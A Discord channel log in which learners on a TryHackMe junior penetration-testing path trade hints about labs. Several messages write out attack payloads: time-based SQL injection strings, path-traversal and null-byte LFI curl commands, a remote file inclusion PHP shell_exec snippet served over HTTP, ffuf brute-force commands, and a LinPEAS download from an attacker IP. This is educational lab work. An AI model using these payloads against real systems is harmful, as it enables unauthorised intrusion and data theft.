#junior-pentester-path

Anyone can help me?

damn, if this is introductory... some of these questions really make me question my abilities

Worked for me. You sure you have the right flag? I know there were other flags that weren't the correct ones displayed when I did it

That room is more frustrating than fun. Theres multiple flags in the XHR...

It's not. It's an intermediate level pathway. It covers all the introductory material

' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--

SQL Injection task 8. Entering this is giving me an error. What am I doing wrong?

Nevermind

I'm beyond dumb

i'm gonna guess column_name, tho i haven't gotten to that point yet

No. You'll get there. I'm just dumb

this room is actually good shit

now we repeat the room in burpsuite and we gold

hey guys, quick question about SQL injection task 8. I found the answer but not the way I wanted to. I found the database's name by doing : || referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'sql__four%';-- || So then I moved to how to get the table's name. So far than I tried to do : || ' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'sql__four' and table_name like '%' ;-- || by doing so I was not even getting the 5sec timer . why ?

check dms

I then just basically guessed that the table's name was || users || anyway and then proceed to a boolean based injection but I would like to understand why I wasn't able to get the table's name tho

ok

ye got it. Wasn't used to SQL syntax yet

Anyone mind pointing me in right direction for Authentication Bypass Task 3? When I try to brute force username/password field, it only tests the first username I have in my list and not the others. I'm tempted to do only one at a time and change the list, but did anyone else figure out how it can test all of the usernames in the list?

did you verify the syntax of your ffuf command?

Yeah it's working. I see it testing the first username but the other 3 it doesn't. I've tried different delimiters with commas but it never goes to to next one. Just tries the username/pass combo of the first username

ah, maybe try putting the names in "valid_usernames.txt" in seperate lines

like
this
for>
example

Yeah I tried that first lol. Dang, is that what everyone else did??

idk, it's what i did

no commas or anything

Double checked it and still didn't work. Stops after testing the first username. I'm not sure at this point, I'll just remove the first username and keep going until I get it

Thanks for the help! @upbeat magnet

Gave +1 Rep to @upbeat magnet

oh well, good luck 😄

I figured it out! I guess something was up with the file. I'm guessing it was because I output my original ffuf command with the redirect operator into valid_usernames.txt When I went in to check on it the first time I had to clean stuff up because there were weird encoding thing's there. I deleted the file and put the usernames in there and everything worked.

aayyy! gj!

can't wait for you to join me on the challenges in "file inclusion" so we can suffer together

I did the first 2. I cannot for the life of me figure out the 3rd

Well I'm probably up all night, so I'm sure being super tired will make the suffering that much more enjoyable

well, i figured out what keys are allowed and the blacklisted ones, so that's a start

Oooo. How'd you manage that?

brute forcing it with everysingle key on my keyboard over and over again

I refuse

and checking upper and lowercase

i'll give a spoiler hint:

Please do

||basically nothing but lowercase keys work. try it out. only normal lowercase letters||

i'm trying to figure out how to:

1. bypass the blacklist or
2. navigate the directories with only those keys

If only lowercase letters work it's likely a whitelist

Not a blacklist

tru

but still, how do you bypass that

actually, i might have an idea, but it's super far fetched. I'll try it out after i sleep

Can someone give me a nudge for the 3rd LFI challenge?

Last flag on the Walking an Application room
I have "a" flag that is in the response header - but when entering it (manually and c/v) it errors on me - maybe too long in front of the screen today......

||Check all of the fields/sections in the right side. I had that issue too, but there’s another flag there besides the response.||

Yes sir - nudged in the appropriate direction - thank you (and a thank you to @jolly vine as well)

Gave +1 Rep to @undone mirage

its something wrong with task 9 linux priv esc?

can't get the reverse in the cronjob

@modest arch same..i've been doing this for like an hour

i set it to do a basic task and doesn't seem like the job is working at all

yeah..i tried a lot of things, and still no luck

maybe the test.py with a python3 reverse shell

i will try that in an hour or something xD

haha gl

Hi. The link https://lab_web_url.p.thmlabs.com/ isn't opening at all. Any clue what might be the problem?

PS: this is task1 of 'Walking an application' room

When I do a nslookup on thmlabs.com, it says can't find an answer

hahahah

so that will update

when you've started your vulnerable machine

it should look like https://10.10.(number).(number).p.thmlabs.com

Yeahhhh my mind has melted today

I've been tryharding it on and off since 9am and needless to say I'm exhausted, gonna hit the hay having done about 50% of the path today

recommended time to complete: ~50 hours 😂

It is not a straight copy and paste for the URL - review the source and look at the URL there for a possible thread to unravel

Hello i was doing jr pen test learning path in that module 2
Intro to web hacking i found 1 flag that never used

comes into play later

I was doing jr pen test stuck at lfi flag3 which doesn't accept any special char or number
A small hint please thanks

Ok ty

Hlo I was doing walking an application room and stuck at task 3, 4th question which says what is the framework flag?

Any hint?

In frameworks there are always some changelog and documentation, I recommend you to check them.

Where are they?

There is one url in source codes comment, related to thm check that URL

LET'S GET DEM TICKETS

did all the rooms, one away from pinneapple, throwback and ejpt 😦 rigged xD

Anyone try Windows PrivEsc room under junior pentester path https://tryhackme.com/room/winprivesc?

Am i overlook or the room missing cred? for task 2 - information - the machines does not have cred given ?
it said, task 2 machine is same as task 4 , i check on task 4, there is no initial cred given as well

use the machine on task 5

to do the task 2

machine 5 sorry*

help me for doing so

or finding the answers

oh.... thankss 🙂

Guys small check here the last in XSS I am not getting response back from staff waited for long time, btw inwas able to get responce back from my own so that the payload works

@dreamy sundial I'm on the same step, getting the same issue. No response

@tawny flame let me know if anything comes up, will do the same

I'm trying both approaches, both with nc and with the THM Request catcher

I’ve got the response but answer won’t submit

@twilit chasm have you decoded the response?

Yeah

@twilit chasm if you open the ticket yourself you will get your session cookie

XD

Hope you dint do that

finally got the cookie

@twilit chasm remove the staff-session= from the answer

https://cdn.discordapp.com/attachments/900296842166804562/900296859006930964/xdd.JPG

all path done, calling it a day, have fun guys!, no luck in tickets bastards xD!

if you guys need help just dm and will answer when i can

How long you waited

I opened up the ticket, just clicking around,

never got it with using netcat

Opening the ticket only gives you your own cookie right?

yeah, but decode the cookie

and use that for the answer, after decoding it

Like yeah just getting pentester title and streak freeze tickets

2 rooms left only ,this path Only taught me how much unlucky im🙂

I did but dint work

Can u send how u r decoding it?

Yeah I only get my own session cookie back when I open it but don’t get a response if I don’t open the ticket

Me 2

I reset the box and got it first time

any progress on this question?

same thing, stuck there and I can't really think of a way to get around it rn

still no progress any hints for the filter bypass? i tried with encoding, doubling the path and back slash but still nothing

@sly fiber dm me

guys i need help with authentication room task 4

Can't access the acme it support site

The machine is running

Wait a bit. webserver need time to load

It's not that bro, it's been working, and I reloaded and now it's not.

Ugh so annoying, I was just getting a good flow 🙂

it's some issue there, do one thing terminate that and again start that then it should work I faced the same issue 2-3 times.

Tried both firefox and chromium, been trying for 30-35 minutes now..

Task 3 of Authentication room, isn't showing valid creds

@modest arch are you using your own box + vpn?

no vpn, just started the machine in the exercise

im talking about your way to access that machine, are you using the attackbox?

No, there was no need to do so in the exercise before, and no instruction to do so in this one. I'll try it.

I was accessing it just fine through the browser @cobalt tundra

but you accessed only the previous one (walking an application) through the browser, not the next one (content discovery). correct?

I have a doubt in introduction to web hacking module there is the room called authentication bypass where we are using ffuf for brute forcing

guys, have anyone got any problem submitting the last flag on the room walking an application

i found the flag, but it does not accept it

And there is the syntax of ffuf like we are using valid_username.txt

But where is the valid_username.txt file?

not sure if theres a flag for ffuf to create it on its own, the output from the previous command was so short i just created it myself by hand

Have you got that flag @cobalt tundra

Hi All - I am just doing the Authentication Bypass room and I am on Task 3 in which I need to bruteforce with ffuf. I am running the command with the right syntax however no usernames / passwords are being displayed.

Anyone else had the same issue?

you have to create the file with usernames that you've found

I've done that

Ohh thank you @modest arch

Gave +1 Rep to @livid drift

can you take a screenshot?

Can someone give me nudge on lfi challenge 3

I don't understand this sentence 😅

Sorry. For some reason, I can't seem to upload the screenshot

Can someone help me I'm on the File inclusion room at the challenge level, trying to get the first flag .I already tried a lot of things including what I think should get me the flag but it's not working. .

Did anyone get the 3 oscp tickets

should be straight forward
using curl with post, passing data in

I have exactly the same problem. First flag can't get it.

Tried with burp. When i change get to post response is the same

I added file as well. Not even a error

LFI*

need help in task 8 of sql injection

hey man do you found wt you did wrong

you have to use the task7 method combine with SLEEP(x)

Stuck at same spot, task 8

Has anybody tried the curl-commands from "Authentication Bypass" task 5 lately? The description says curl -H "Cookie: logged=true; admin=false" [URL] should return "Logged In As User", but I get "Not Logged In" all the time. Tried multiple times, different machines, tripple-checked the IP every time. (Working from AttackBox)

my description says logged_in=true, typo on your side?

Finally. Open website with web developer tools / inspector (im using firefox). Then find form action method GET and change it to post. Then write in file name windows file you are looking for

No, I just checked again, it says "logged=true" in the assignment. But let me try this out with logged_in, brb.

That was the only way I was able to get it as well.

I understood 😅

"Principles Of Security" Room, Task 5.. I think the positions of Identification and Preparation in the diagram are inverted, what do you think ?

||curl -X POST HTTP-URL -d "file=../../../etc/flag1" | tee task8-flag1.txt||

this is another method

ok, it worked with logged_in. Thanks!

Gave +1 Rep to @cobalt tundra

maybe some older cached version or something

null byte

Lol just made realized I used the wrong curl switch

😅

I'm having nightmares with File inclusion flag 3, everything I've tried out is filtered

then a browser might not be the right tool for the job

thanks for that

Gave +1 Rep to @onyx plover

i got user and dbs names but havent solved task 8

have you get the password for the user?

nope

try to get the password? it will be the same on how to get username

Anyone here who completed windows and linux privilege escalation one?

U also stuck on these 2?

just finish

Can u help me with linux privsec with tht cronjobs parts?

Its not triggering my reverse shell or any other command in backup.sh

you will need to put the script in the right directory

In home?

if i recalled, the script is right at the home of user

just ensure your reverse shell script does include shebang line

Stuck at flle inclusion challenges any help? flag1 no luck POST /challenges/chall1 no luck with chall1../../../etc/flag1 no luck

See the error, the function may be adding something at the end you can remove with a special byte. Solution: || null bute %00 ||

Check the permissions!

ye its 2 lab im stuck at first it says change method to post The input method is broken You need to sende POST with file parameter,i tried with burp nothing

1st challenge requires apart from changing the method to POST to add that special byte at the end of the ../../../etc/flag1

I must be blind as I can't find some flags

and its so simple I feel stupid for not finding it

Looks like file inclusion is getting to us all

Stuck on Challenge 2 now..

Want a hint for 2nd challenge?

I imagine its related to changing the cookie value?

It's the 3rd one that's mindbreaking

Yes

POST /challenges/chall1.php?file-file../../../etc/flag1%00 Nothong

ive changed it and got presented with the admin page, stuck there

Are you doing via curl or modifying the page source?

with burp

I did it modifying the page source and I had no problems

Although here it's should be file=../../../(...)

Check the response, maybe the cookie value is been used as another thing apart of checking which user you are

like a burp response?

Welcome admin
This is a admin web page! Get the flag!

I just got the 3 LFI challenges done. Any tips/resources for RFI? Not sure where to start

i had a leftover flag from a task, weird

Post /challenges/chall1.php?file=../../../etc/flag1 Nothing

got the same

hit a brick wall after that stage

Null byte is missing now

even curl curl -v http://ip/challenges/chall1.php -X POST -d 'file=/etc/flag1%00' -o flag1.txt

Found out the flag i got was for a later task, somehow got it before i had to

no with null not working

I don't remember if there was an error msg after that but here is a bigger hint: ||cookies can also have lfi vulnerabilities||

The ../ are missing, try modifying the page source code, its much much simpler. You may also want to capture it with burp so in case you miss the first one you can repeat it with the repeater

Can you halp me with the 3rd one? I can help you with the RFI

I am not sure on how to bypass the filter on the 3rd challenge

||I got it with curl and POST||

just need curl to output to stdout

It was much simpler than I thought xD for RFI: ||you can include files form other servers so setup an http server on your machine with a txt file with the malicious php code|| if you need more help you can dm me

Thanks, i've tried changing the value to ../../ ect but it just increments the directory. i've tried changing the Path for the cookie but that just generates a new one. I can only assume its the Value filter only that needs changing

Gave +1 Rep to @unkempt root

It have tht line

then the permission, as fellow mate mentioned
no execute right

You must take into account that the include function is already inside a directory || so instead of 3 ../ you'll need 4 ../ ||

😫 it was literally that I missed

tyvm for the help, got it now

ur welcome 🙂

nothing workin can you give me the answer plz for lab1

1 sec, I'll send it to you via dm

Can you give me a nudge as well?

lucky title?

oh no, everyone has it 😂

do you have to do something to "activate" the title?

does any one got the OSCP ticket even single time?

Go to your tickets, if you have 3 you can active the prize

ye, i activated it, it just doesnt show up/change

Anyone have any hints for flag 3 of LFI?

there was a popup after activating it, but i clicked it away without reading :)

that enough

||post||

huh, i took a different approach to flag3

||i gave up with FF and went the cli-route||

guys need answer plz LFI2 Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

Is there a way to kill all current running machines on the homepage?

#general message
Had the same question earlier

seems like quite the unintuitive and hacky way

Nope

i got 1/3 OSCP

any help with LFI flag 2? using curl
nothing is working, just like the flag 1

THM=../../../../etc/flag2%00

guys how can you get
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

||You follor rfi guide. You need a file and server||

i made this and nothing cmd.txt --> '<?php echo shell_exec('hostname');?>'

'python3 -m http.server 8080'

input: 'http://10.10.153.7:8080/cmd.txt'

Yeah I'm having a little trouble with that too, I've got my file uploaded but it doesn't seem to do anything when I inject the URL. I even tried the Hello THM code from the RFI example and that doesn't seem to work either

Can u help me for LFI room ?

Twice

nice, all boxes done or some left?

3 left, I think

I don't know what im doing wrong with the Logic Flaw task

ive done everything it asks, but cant get a flag

curl -v http://ip/challenges/chall3.php -X POST -d 'file=/etc/flag3%00' -o flag3.txt

My machines in the JPP keeps timing out, anyone else that has that problem?

not working

i feel stupid for not working this out

Don't feel stupid @modest arch I'm in the same spot 🙂

For task 3 question 3 of walking an application from what I can tell I'm supposed to open a directory in the web browser to find the file. How do I do that. Brand new to this

on Authentication Bypass?

on the LFI flag3 task

ah

this be causing me a headache ngl

Add to the URL

can i get a hint on how to get to roberts support ticket

been reading through the page and trying anything i can think of

2/3 now

Anyone currently doing LinuxPrivesc module?

Crontab is not running every minute as stated....

@buoyant dagger sorry if I'm not supposed to ask but for clarification I am not sure what to add and I do not know what a directory listing is. I've tried adding /directory. /file.txt. to the home page and to page source

What is the directory listing flag?

how to find it

Need help in this one…. Any suggestions,

Check the images in the page source, you might have missed something

how to list out directories

You can use gobuster for that

and man/tldr can help with gobuster

gobuster/dirb/dirbuster

Stuck in this “Burp Suite: Repeater”😑 suggestions are welcome

dirbuster is old. Not recommended

Man, I can't get this RFI example to work even. I've got my HTTP server up and I can see the site making the GET requests but it's not printing anything...

Why this crontab not running -.-

Driving my insane

lookup php passthru for the php .txt file on your machine

is anyone stuck on the file inclusion challenges????

Read up a bit in the chat, loads of us were stuck earlier and there's some good hints

check permissions of your script

Stuck in this “Burp Suite: Repeater”😑 how to get 500 internal server I’m getting 404 after messing with numbers

Maybe your numbers are going the wrong way? 😉

how long does this take to give the right cookie

You have to do it blind folded

Any suggestions… ¿ I tried every single fucking way 😵‍💫

will this work if i add some php file like cookie grabber or its still the same with the given payload there

i cant remember what eventually worked for me but i remember trying some under 0 some above 999 and even some non-numbers and eventually got it

misread your question, it should be instantly

no php required, all you need is already in the description

i can get response if i click the request ticket so i guess my payload was wrong

@knotty belfry Thank you for the help, I still don't know what to do with the info you have given me. I think its safe to assume my current level of knowledge is not up to this learning path yet. What paths should I be able to do first so I can complete these?

Gave +1 Rep to @knotty belfry

@cobalt bramble start with pre-security then complete beginner and then web fundamentals

Please give me a hint on question 2. I have all the others done and I don't see it brought up in the past

@surreal narwhal Thank you. I'm on the tail end of Pre security now

Hey, im stuck since 1hour on this question in the Local File Inclusion room, challenge 1, can anyone help?
I tried to modify the GET request to POST and tried path traversal ... nothing works

Yep, come back to it in a couple hours or a day so you have a fresh look and keep my hint in mind, it will dawn on you, I'm sure of it. As the saying goes, try harder!

Thank you! Not sure I would have ever tried that.

Gave +1 Rep to @steel nymph

I would recommend using curl.

holy shit i got it

@crimson lark thanks, i didn't use curl, i just realised i hat one "../" too less

Gave +1 Rep to @crimson lark

such a stupid mistake

if it makes you feel better i've used curl, burpe and dev mode and still haven't figured it out.

Were you editing burp?

hi, all on the linux priv esc module - priv esc sudo task.... there is no gcc available to compile the code.

@indigo axle do it on your attack platform. I assume your talking about the one with mounted shares

@crimson lark @charred wagon no, you don't need burp, you need to edit the form in dev mode, the method and the action

got it thanks just need to use attack box

Gave +1 Rep to @cobalt tundra

@digital pendant this one is making me feel dumb

its the LD preload section (Privilege Escalation: Sudo) im doing it on my own box

( i ssh as "karen" into the victim box)

I'm right there with yah

Compile the script on your own kali machine and then transfer it iver with an http server and wget

honestly a few of these had base64 with suid bit set and i just used that where i could

ok brill thank you @drifting drum

Gave +1 Rep to @drifting drum

Yea. Same here

Lol

@charred wagon i wrote you a pm

I've edited the method to post and change the file to the path. What am I missing?

Could you copy me in that

idk if this is allowed?

What do you mean?

same haha

@crimson lark you can ask @charred wagon , i just showed him

can any one help me with this i am unable to find it in th path

/h...

https://tryhackme.com/room/linprivesc
TASK 10

I think it's a known issue.

curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum

how to know the framework of favicon

??

use the site in the task

..

the link is of the website itself

ok

+1

got the answer

@nimble turtle mind if i dm

I need gentle hint on room SQL Injection for Task8

On Linux privesc NFS room does it matter which one you mount?

I am getting OK for all the query execution. I am referring to TASK7

You can dm me

curl the only way or can you do it with dev tools or brup ?

worked for me

Must be doing something very wrong then

with dev tools the null byte won't work. thats why i'm wondering

do you know if the task 9 is working properly ? cron job didn't seems to run, 0 reverse shell tried also with the .py file same

k will check that

gotta say I love this path

• the linux prive esc tab is saying "connection error try again in 15" i've already rebooted the thing but same issue if anyone have an idea

just try to ssh

ssh is working fine

but crons seems stuck

same for me lol

...it worked for me

damn @robust steeple by bash or python ?

i've tested 3 bash reverse shells no one seems working

thats why i think than the crons are down ^^'

which cronjob you trying? it worked on one for me but not the other

bash backup + created the .py file

in /tmp

pretty sure thats how i did it

hummm you used the revershell provided in the course or an other one ?

yeah the python revshell

This is probably a dumb question. But is there any reason you have to wait for the cronjob to run? Can you manually run it?

check your permissions

You could manually run it but you'd get the same privs you already have

I'm not sure I've completed this task the intended way.

Im struggling with the file inclusion challenges

👍 ill look up

@robust steeple you can but the main goal here is to make run the cron by the root this way when the reverse shell will pop you will be logged as root

Yeah, I got root another way apparently. Thanks though.

Anyone know why the RFI wouldn't work in my kali VM but worked perfect in THM's kali box?

never mind

it was me being dumb

Is there anyone who relay got any vouchers for ejpt or oscp

nah man ig they desined it for not to achieve it

done %69 and after a while it started to give same bad thing like title and freeze

same here

and I have just 2 rooms left

at the begining it was nice but afterwards they dont give a damn thing

the linux/win priv esc

so sad rlly

Ya for me too

Sad

we got scammed ig

I am at 50 per with 2 oscp tokens

This sucks

yeah me too

They shouldn't do this

stuck with 2

yeah me too

1 hak5 1 ejpt

XD

i also got 2 on all the nice ones

that was by the moment I got 50% rooms

good luck man

after that ... just small vouchers, duplicates and so on

All I am geting that stupid pentester badge

prob not gonna get anything but good luck

exactly

if you look ... no one officially won those nice prices

no swag discounts

which is super super strange

according to the rules ... there are even chances

i think we must wait till the end

$7k it seems

i think we must wait till the end

Ya let's see

studied the content for nearly 10 hours

waiting or not ... it is not stated that they release them daily or something like that

yeah, at least the path was a big push in learning 😄

that's the great win for all of us

yeah but maybe they are planning to do so

imo didnt learn too much only small details

didnt learn such a mind blowing knowledge except for burp macros

guys can you give me anwer of SSRF Examples Task 2

Dude you can't ask for ans in here

Let kknow where you are struggling

maybe thats way they dont give it this easily

to eliminate the voucher hunters only looking for vouchers without understanding or working on the topic

cool story kid

i dont say you are one no offense

just got me thinking

im stuck at https://server.website.thm/flag?id=9&x= thats not working

good question kid

I got emailed a swag discount

same 3%

Guys in the SQL Injection task 8 ... I am not getting an answere

You're gonna have to give more info than that

There's a multitude if reasons that could cause it to not work

referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--

Follow the enumeration of task 7

every combination of % is giving me true

This hint its wrong follow the paths of task 7

okay !! let me try

Same but with sleep

Because admin123 isn't your referer. Reload the page and look at what the referer is supposed to be

tryhackme

Yea. So swap what disebt belong, with what does belong, and then that hint will get you started

referrer=tryhackme.com' UNION SELECT SLEEP(5),2 where database() like 'u%';--

so the final sql querry ::

select * from analytics_referrers where domain='tryhackme.com' UNION SELECT SLEEP(5),2 where database() like 'u%';--' LIMIT 1

still executes in 0.001

Well, that exact query won't work. Because the database name dosebt start with a u. Now follow the enumeration process detailed in task 7

right from a !!

okay

getting there ....

Sorry to butt in but can anoyone help me with the Linux PrivEsc room? crontab reverse shell just will not connect.

Same here!

It'll take a while

I haven't gotten there yet

referrer=tryhackme.com' UNION SELECT SLEEP(5),2 where database() like 'sqli_four%';--

Need some help with LFI flag 2. Got 1,3,4, but 2 is killing me. I have ||Curl -X POST -d 'file=../../../../etc/flag2%00' http://IP/challenges/chall2.php -H "Cookie: THM=admin"|| ... all I get is "This is a admin web page! Get the flag!"

ok, you're halfway there. ||now play with the cookie value a bit more. See what happens if you add stuff after admin||

@coarse marsh Most frustrating crontab exercise I have done.

Absolutely, i've been stuck since yesterday, tried a lot of things with no results.

Have you tried the TryHackMe request catcher or attackbox? I had a similar issue on VPN a few days ago

i don't think it's a vpn issue, i tried to get a normal reverse shell and it worked, the problem is with crontabs i think.

@upbeat magnet Got it, thank you!

Gave +1 Rep to @upbeat magnet

https://tenor.com/view/hackers-hacker-crap-gif-13228159

Hello Everyone, I am stuck on Task 8 of https://tryhackme.com/room/xssgi. I enetered the payload and started a listener, but my browser is failing to execute fetch. Any ideas what to do? 🙂 Cheers

did not get it yet

I tried !!

I was having trouble with it earlier, might have to do with the VPN and/or Firefox. Try using the AttackBox instead, it worked for me

anyone got a hint for file inclusion lab3 ?

I got it! I am not sure what was the fix but message me if you want

Thank you for advice, but I found the problem was that I left the IP inside {} 🤷‍♂️

Gave +1 Rep to @fiery dirge

Hey guys, im doing the inclusion lab 1

I understood the concept in my head but i just can't seem to know what to right

Im stuck

Dm me if you need help

Sure

im stuck on the lab3 in file inclusion, anyone got a hint for me?

Hey guys, I'm trying to do task two of the SSRF room and the example is just different enough from the task that I cannot wrap my brain around it. Any hints would be great

Task 6 of the same room may have the answer you're looking for

@hollow acorn yeah but i don't have a webserver to host the file?

I would look up how to set up a temporary web server using the command line

i just got it with curl 😄

Awesome!

@hollow acorn Thank you!

Gave +1 Rep to @hollow acorn

Gave +1 Rep to @hollow acorn

Gave +1 Rep to @hollow acorn

Gave +1 Rep to @hollow acorn

Gave +1 Rep to @hollow acorn

Take a really close look at part 4 and the hint

Your input is going to be structured similarly

If I add my input to the end, it attempts to reach for both item 2 and the flag. Do I insert my command before item 2 or can i enter the command after?

Hey so I'm stuck on task 5 of the Linux Privesc room. I can't use nano or wget to the get the kernal explotation code on the target machine. Has anyone else had this issue or am I missing something?

Wget should work just fine

If it's not, you're doing something wronf

Wrong*

||After, and you need to use &x= at the end||

That’ll do it

anyone wanna do the File Inclusion Playground?

Compared to the LFI challenges, the playground challenge is easy

"$ wget 10.9.5.54:8000/LinPEAS.sh
--2021-10-20 16:25:49-- http://10.9.5.54:8000/LinPEAS.sh
Connecting to 10.9.5.54:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 459310 (449K) [text/x-sh]
LinPEAS.sh: Permission denied

Cannot write to ‘LinPEAS.sh’ (Permission denied)."

This is what I have "https://website.thm/item/2?server=api.website.thm/flag?id=9&x=". When I enter that I get an error stating 504 Gateway Timeout. What do I need to modify in the url to get it to work?

thats the error I keep getting when using wget

You can't write to the directory you're in.

Try moving to /tmp

Take another look at the URL you're trying to get to

That worked, I'm an idiot lol. Thank you!

I modified it to api.server.website.thm but that didnt work either?

Do I need the https at the beginning?

@drifting drum is it solveable without a webserserver?

No

You need to host the file somewhere

hm

how tf do i host a webserver

Are you sure I don't need to add the flag url before the item url? It seems to want to get both and errors as a result

Python has a useful module for that

^

What kind of vulnerability seems to affect the Fitbit application?
found the vuln but i dont understand what i'm supposed to write (not english native is not helping much tho)

Python has a module for that. Try googling it

||https://www.exploit-db.com/exploits/40482||

You're close, look at the target URL again

You're not trying to get to api.server.thm

Hello guys, anyone solved "File Inclusion/Task8/Challenge3" ? I'm running out of ideas...

Ah, the fact that api was included in task 4 really through me off. Thanks so much!

Gave +1 Rep to @opal stirrup

Yes. What have you tried?

Can I DM you ?

Sure

"In Lab #2, what is the directory specified in the include function?"
I did not understand that

what include function

For anyone stuck on flag 3 of the challenge in file inclusion, it is very similar to task 6 in the same room

Look at the errors it gives when you input incorrect data

The website is timing out i guess there is a lot of activity

nevermind my internet is shit haha

Lol

got it !

👍

Quick question. Is the answer for task 3 of the SSRF room in the information provided or do I have to research to find it?

Just kidding, I found it

Thanks for the help everyone. I'll hop on a bit more later 🙂

Man everyday i notice how much i don't know and its scaryyyyyy

can anyone help me with the file inclusion playground? i don't understand this

like i got the webserver running but how do i upload a file ??

Knowing what you don't know is better than not knowing what you don't know

You don't need to. If you used python then all the files in the directory that you started the server in are automatically being hosted on the server

@drifting drum you mean i can mv my file locally and it will be on the server?

oh fml, of course bc the webserver has no database, lol i need to go to bed

😂😂

@drifting drum in which directory would that be ?

Whichever directory you started the server in

there it is! thank you @drifting drum i think i can do the exploit

Gave +1 Rep to @drifting drum

guys help with payload in command injection
What are the contents of the flag located in /home/tryhackme/flag.txt?

Np

yes curl id whoami not working

@drifting drum actually no, can you help please?

With?

well i "uploaded?" the file to the playground by adding ?file=http://my_ip/my_file.php

then i wanted to execute it

@drifting drum thank you so much for the help!

Gave +1 Rep to @drifting drum

rep point just for you ❤️

what command could i use to find the most common size from the size field in a file like this

That's detailed I'm the task

i paste from cheat sheet commands they not working

@drifting drum yeah i tried it like that

I'm at task 5 Local File Inclusion. Any pointers on first question?

got it tnx

Anyone done Metasploit exploitation Task 6, keep getting Segmentation fault (core dumped)
while running the payload

It won't let me enter ANY character except letters? Any help

whats a "Throwback voucher" ?

How do I use the premium vouchers and stuff

Is someone able to PM me about the LFI challenge as I have followed the guide and no luck and want to check the answer I have?

can I send too?

for same challenge? I'm close, but struggling with syntax

task 2 of ssrf room help needed

Hey, In the new junior pentester path, there is 2 privesc rooms. The linux works really fine and the credentials are given in the room, but there is no user or password in the Windows room : https://tryhackme.com/room/winprivesc . Is this normal ? It seems rather complicated to get an entrypoint on this compared to its linux equivalent.

hints needed please

Anyone help with LFI #2 question 5, sry.

:p thanks, I've tried bunch of those but...

in sqli found martin password but can find flag im blind

Speaking of that… I’m stuck on challenge 2 - I’ve got the cookie bit but I can’t move

I'm think what I'm getting down there is correct but it's not working

not getting what's wrong

me 2

can I put the "Server requesting" url here and mark it as spoiler?

nvm, got it :p

ty

thanks it's solved now

Gave +1 Rep to @steel nymph

Any hints?

What do you mean abou tplaying wwith cookie?

Change from Guest to Admin

Received another page

besides admin?

I tried changing path and adding ../ to admin

And bill bytes

thanks

Gave +1 Rep to @steel nymph

Already tried a lot

this way I got an error

error

Current Path
/var/www/html
File Content Preview of teste
Welcome teste

Warning: include(includes/teste.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Warning: include() [function.include]: Failed opening 'includes/teste.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37

Current Path
/var/www/html
File Content Preview of ../../../etc/flag2
Welcome ../../../etc/flag2

Warning: include(includes/../../../etc/flag2.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37

Warning: include() [function.include]: Failed opening 'includes/../../../etc/flag2.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37

omfg LFI 2

thanks for the hints

included the escape (%00) but not works

Sorry for not answering sooner. I'm back now. Were you able to get the flag?

Yes I was thank you 🙂

Gave +1 Rep to @hollow acorn

Glad to hear it! Great job!

/var/www/html - 3 levels?

worked

thks

@drifting drum i am stuck with "File Inclusion/Task8/Challenge3" can you please push me to right direction ?

thks @steel nymph !

can someone help on ""File Inclusion/Task8/Challenge3""

i tried POST as well...

any small hint will be helpfull... 😉

can i DM...

@steel nymph I got the /etc/passwd on 2 question lab 4 but dont understand what function is making the directory traversal?

in time based sqli payload https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- not working help

thanks 🤦

Gave +1 Rep to @steel nymph

thanks a lots @steel nymph...

Gave +1 Rep to @steel nymph

I let my subscription lapse but started doing this path once I saw it released. I finished a couple rooms and got 1 ticket from each. The pop-up says you need to subscribe to get an extra ticket. If I subscribe now, will I get the tickets I missed out on?

heyyo, I'm having some trouble with inclusion. Doing the first LFI challenge, || I know that I need to change the GET request to a POST, and have tried to do so both in dev tools in firefox and with burp. It seems to just respond with a normal webpage as if I had just sent a get request... any ideas? ||

https://httpie.io/docs is a great tool to have playing around with forms

I even did it manually with curl 🤦‍♂️ still the same thing, just a normal response

|| curl -d "file=/etc/flag1" -X POST http://10.10.75.195/challenges/chall1.php ||

anything wrong with that command? @fading pulsar

nvm I'm just dumb 😂

trying to grab /etc/flag1 without dotslash

not dumb when you catch the mistake 😉

Well that sucks

@steel nymph Thanks for the reply

Gave +1 Rep to @steel nymph

Hello! Im on task 2 and I ran the command user@tiny bluff$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

Is it suppose to take forever?

Its been scanning for 20 min so far

just did it now, 13 sec

well i must be doing something wrong

Linux PrivEsc Task 10
Can some give me a nudge as to what's odd in PATH? I hinestly have no idea

I'm probably just blind, but I'm at a loss here

Whats the exact command you put in?

@drifting drum error in the text there... check the forum

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"

Hello, I'm working on walkinganapplication room and I can't find the first flag (which is supposed to be in the comment section).

Wow. They asked the complete wrong thing lmfao

That seemed to work

thanks

hehe, yeah

@drifting drum i bugged a long time before i checked the forum, tried everything

This PATH one has me still a bit lost even after the forums..

I am understanding the theory but in practice I fail

They didn't do a good job with the questions for that one

LFI challenge 3 is making my head hurt ngl

They filter all special characters and numbers 😂 guess that's what makes it fun

Not everything is filtered 😉

yeah found that out but still I can't get root now matter what I try

I'm working on it now. Will let you know in a little bit. Pretty sure I know how to do it

If you can lend some insight I would love that. ||I cant compile on the machine and a file transfer looses its suid bit.||

dont need suid, its about the path 😉

JaRam can you message me for a second?

sure

So um... I did a thing

I'm not entirely sure how, but I was able to read the flag without getting root

